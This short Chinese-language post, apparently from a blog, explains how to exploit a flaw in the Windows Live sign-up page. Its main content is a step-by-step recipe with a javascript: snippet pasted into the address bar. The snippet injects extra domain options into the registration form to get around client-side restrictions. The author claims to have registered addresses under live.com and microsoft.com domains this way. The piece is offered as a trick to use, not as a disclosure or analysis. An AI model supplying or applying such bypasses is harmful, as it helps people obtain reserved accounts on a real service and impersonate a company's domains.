一个 Windows Live 的 @live.com 域名注册漏洞被发现,现在我们只要通过简单的一段脚本代码就可以给 Windows Live 的注册界面添加 @live.com 地址,让人惊讶的是,硬塞进去的地址竟然可以成功注册到帐号!
1,http://get.live.com/getlive/overview,点击“立刻注册”;
2,把以下代码复制进地址栏,回车:
javascript: var p = 'live.'; var ds = new Array('com', 'cn', 'fr', 'it', 'nl'); for (var i = 0; i < ds.length; i ++){document.getElementById('idomain').options[i] = new Option(p + ds[i], p + ds[i])} alert('domains added');
3,在域名下拉列表中选择 live.com / live.cn 域名注册……
LUCKY...注册了一个 afly#live.com,还弄了一个 afly#microsoft.com,不过登陆后无法使用,还弄了一个 afly#microsoft.cn,哈哈。
